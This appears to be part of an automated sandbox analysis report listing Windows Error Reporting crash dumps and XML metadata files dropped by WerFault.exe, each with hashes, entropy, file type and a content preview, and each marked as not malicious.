                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER22D6.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.4872225206833
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYZYm8M4JKTJFbM+q8v+Tuh0B9ned:uIjfrI7Cj67VFJqMKF0B9ned
                                                                            MD5:1C22B6CF63833F92178DAB9A3013EDAC
                                                                            SHA1:7C12487F744ED0796F85FF222A84648D3B9A6139
                                                                            SHA-256:61740C1CFDF0B6AE69CF07656094680576231E7C9B039D69AC45784CAFBBF251
                                                                            SHA-512:93E53F71B4D250782A1DEC1B078A0D07708E7ED0FA92DE57DBAC0424016753024270E1857A065CBC75DF53B86192C524BCEA313A6B73C4514DE0EAD563E59BBA
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2833.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:53 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):62912
                                                                            Entropy (8bit):2.2421321966273573
                                                                            Encrypted:false
                                                                            SSDEEP:192:Rs3QyuX6tlLXFkltJIJmO2gtg+XEtW0VsOFFwGuBtHiM12bDaklr+1XLY3hyCHWG:7ynlBkltJUhgcE7Vsiwttua9m5HIF9m
                                                                            MD5:1B8CA42874D58D1021E7DCF7810578F5
                                                                            SHA1:C8E045617B6A57B2151E65B80A4720BB4900F955
                                                                            SHA-256:7E812A091B8CC78E65D3719248012375D96BB0C589B07984C220B32477613FD6
                                                                            SHA-512:CA6D92AB3E1EA4CE51F7B311B6E776FA07448CFC0B930609D19936AAA0D83BF501DB5774AB5FCC8256461509568770511623A4EEB72FA77639D30F729967BDCB
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER28D1.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.716334020844339
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBS6RsarYUMaAjAbpBa89bo5sfVmjYm:R6lXJ26RsGYdaAjAHoSfwp
                                                                            MD5:C9905BB4B794B3E7E0E78DBDA688845B
                                                                            SHA1:71B9BDA1FAC7EFABE0EA4204C580FEA22B752910
                                                                            SHA-256:80FABD84455679EB7D655F959C3F5A633BA6A8FFB5CDBFEFB5DF30D3D436FB19
                                                                            SHA-512:8457B4608AEDA35334D50E2EC32441663F4E99CAF4BC06618CF96C1102EF6A2F577547F56F5C5BB4FFA159707CE4E09A0A3BA34855343A5DAE68E0C59905356A
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2901.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.485801096643135
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYDYm8M4JKTBFL+q8v+TGh0B9ned:uIjfrI7Cj67VXJWKt0B9ned
                                                                            MD5:4FBA274419D3BFED0245C8A4E742177F
                                                                            SHA1:C337DF5844A7D55C3CBD5384D01ADD982708E5E2
                                                                            SHA-256:D6BBBA1BFC3E595C1FEDD3EB52800D37C7B55629115237E748ECA06BBF15546F
                                                                            SHA-512:42AD4F9EDB80099FD1FCBC69D687383E7BFBD181A8A64902B23868BF7414F5E127EB241ABBC472F03A6FB6B472FD312599CE66F2455AB625EA5906B539F90B91
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D35.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:54 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):64376
                                                                            Entropy (8bit):2.2541171087474567
                                                                            Encrypted:false
                                                                            SSDEEP:192:WjyuX6tlLXFkltpetmO2gtg5yWABN+2vsFRvqDaklr+1XLY3hyCHW769/7gZ6ReY:IynlBkltpKhg5+NHsfvsa9mMZe
                                                                            MD5:DCC9304A3685A9D2455DCD4B3B869D06
                                                                            SHA1:60C1ACF6A8C1BF47B9CD6BD5E8EBD1F9BE6B93F3
                                                                            SHA-256:C172697BFBAB42988D6B10F31EDA3D6CDDB2BB1B6350920C8AE5B4F992CC5339
                                                                            SHA-512:84B673114768FE5C3DBA87FEF980003D92D18166D0AC33FEC8C9D11051F9DD2D3CB601E3CE534BC41F9ED3856751DC2B19ACACEB615FC73C04B26D3A8EA5B7D2
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...........H...0...........L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D93.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7180022568204136
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBY67J8YUc0pB089bH5sfAG2Nm:R6lXJ867J8YNiHSfjd
                                                                            MD5:46DE90D96E677F92DB7898F949C5ED00
                                                                            SHA1:0A2B691B5B5081C6105C5FAC52594BA5D5C2C0D2
                                                                            SHA-256:3C36B5B0076A34FF5DFA39A3FFFE0C2ABE16FC1AF877840BB198151681D90B13
                                                                            SHA-512:8DC9C03AB40BE95E416AACD47FBDEAAC84730D9707E41F5EB72E966B61100151F396171B6B0AD44CF7BE8797E52C8B84DFEA8FDF08B55F7DAD861333ED32C5E8
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DA4.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.488099532871176
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYuYm8M4JKTJFCto+q8v+Tuh0B9ned:uIjfrI7Cj67V2JNoKF0B9ned
                                                                            MD5:CA2DBDA4377D9248C028C3C1DD5C648E
                                                                            SHA1:4C0457E663CEC8BBA5CEC675B68230B828CBD90A
                                                                            SHA-256:9A41AA9589368DC789EE02322DF58275AEA73D07E3DE589051C9EE7E7BC98DF5
                                                                            SHA-512:8F20789362D0B1E1D12992E4079221DB48309B69E020F717895A128F336CA43828A3840254126C57C6408628AAD63963492D4447BF88B666B95329880369D065
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER36AB.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:56 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):63010
                                                                            Entropy (8bit):2.2444467027294777
                                                                            Encrypted:false
                                                                            SSDEEP:384:uynlBkltk1H9hgUEGsQzwc+cQa9m7XjUm:llB+QdhgNG/wcIaX
                                                                            MD5:97D41825E79DFD080E5F4FA105AED92C
                                                                            SHA1:968A05669E7D4A8CF3DF506695289865C10DF172
                                                                            SHA-256:2AEF20E9B1B0AABD116BA3D3AEEB21477BFD556433CDE1E3BBF8100DA19CFD30
                                                                            SHA-512:5625D03C95D29904FAC1A5B3D28EEA086D4F21AF461EE02B3788366C9756278A3D5BD654BA5A615AA403FBD32224E86FF484C6C6C2986EAD914C5200B15655C5
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...............R...........L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER3786.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7165751716228654
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBZ61JuYUMaAjAbpB089bV5sfInm:R6lXJ961JuYdaAjAVVSfV
                                                                            MD5:2DA117A079F416B3EE2C904C6014EC35
                                                                            SHA1:51975C894ED44200663C67E2098B0F055F5740B0
                                                                            SHA-256:CAA9C7119882AEEB013838168C50C72A9549B1F9C5E8FEFCA44BE41E3D8F2F74
                                                                            SHA-512:88CC4DA6080F566A63F127DB8EBA235D833688AF96FA42A11014E6B1F803AD2CD1957F49898367D3321CA24078B401E3A38F7CA4A9000CB064EEC1E4F61C0AF3
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER37A7.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.485245416337371
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VY+5Ym8M4JKTBFy+q8v+TGh0B9ned:uIjfrI7Cj67VFoJPKt0B9ned
                                                                            MD5:14D6C143D5B57C61DA524D54E9F69D2E
                                                                            SHA1:A1E1BB90389EF6D0A28242A6B258C1714762614D
                                                                            SHA-256:615AFBBA02797EFBAA2DFC13D412F7BB4C5E622AC393978A1BEACEE12AFA17DC
                                                                            SHA-512:ABF07D77C933DDECCA24E89F5736C59487C9A12546BBE62A255992E6573BF88100E10E9CE454E96B436DD7F02501A7F5CAD060A44301C646A4AE70ACCB6E33E4
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER391C.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:57 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):64474
                                                                            Entropy (8bit):2.254615572925628
                                                                            Encrypted:false
                                                                            SSDEEP:192:dGyuX6tlLXFkltceJmO2gtgZEyWBKhsSEPM9dB5OL2PvAaklr+1XLY3hyCHW769Q:4ynlBkltcehgGtKhsSEkZ59oa9mHoEM
                                                                            MD5:A9C32A3AF1825093371320E62490316F
                                                                            SHA1:C9A30F3EC27C27EE98392B2FBA4A58CBC2205EB8
                                                                            SHA-256:76ECD2282787142E76C5DECDA9A84C66E892574E4C0C40ACECE15CA4C1F3FC71
                                                                            SHA-512:81B6AE0E93BF48422F2F9111A1C19A92BD0856691176E56813DC9241F74F06694439F66485D60D1CBE52BDF4AB5A67C247B1DAD12DB3065013EDCCF4B59194A2
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...........p...j...........L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER397A.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.717806395746615
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBc6KJSYUc0pBw89bM5sfgckm:R6lXJ46KJSYNOMSff
                                                                            MD5:8911940252109DB1E36074B481570F4C
                                                                            SHA1:BA79844360199ECCC873537DCF2D4970DB062132
                                                                            SHA-256:013D5863AD189872F753C0454D89694D50EA2420EF1A311E02628672414D7932
                                                                            SHA-512:DAB829159E334DD63E6FAE2E3FE52C84165993E8295C9414B80E961FFC1C0C8F990BD0860223944A4E1FD92B71B90E41C7586CCDFA35BE4FBCE08D7D931579DC
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER399B.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.487112423625816
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYN5Ym8M4JKTJF0+q8v+Tuh0B9ned:uIjfrI7Cj67VaoJdKF0B9ned
                                                                            MD5:E50735DB8360C6B976F809A9670A796E
                                                                            SHA1:03911A000294340600972A11056F4C68A2D594FC
                                                                            SHA-256:AD50517FF5EE59D14D7D1407F04B643D538E03514B4162781F36D1D2E422DF0D
                                                                            SHA-512:9789022C8A49C3B506670EE237C9E84736244752573AC2186F7B2EA171AE8473F630F88AAF8236A3E405A01F319D446E05FBA141D4A21E9D98AD63AC0407FF08
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER402.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:43 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):62618
                                                                            Entropy (8bit):2.2377366918151598
                                                                            Encrypted:false
                                                                            SSDEEP:192:biyuX6tlLXFkltsk3RmO2gtg+XGtWGsyVFwouBd8c2bDaklr+1XLY3hyCHW76fFm:2ynlBkltBhgcGRs2wPdwa9mbxqYm
                                                                            MD5:6505B3CBC8924D69048EBBB9F6AC7B42
                                                                            SHA1:97B04D165A4E1B43DF6960D8CFA8BC814DF501B6
                                                                            SHA-256:A042C613A8E526105C957BDBF44866185C9D2675E241BBA7147D236D24A26CEC
                                                                            SHA-512:E6897A40F70FB450F71B27DA7D8B2ED363202CC9D477AF23C77B1C1265B6AF682790D9C67EA9CA7A10F660C329E4B0B7D0DE2DE308E0FD15FF58A9ADC593BF8B
                                                                            Malicious:false
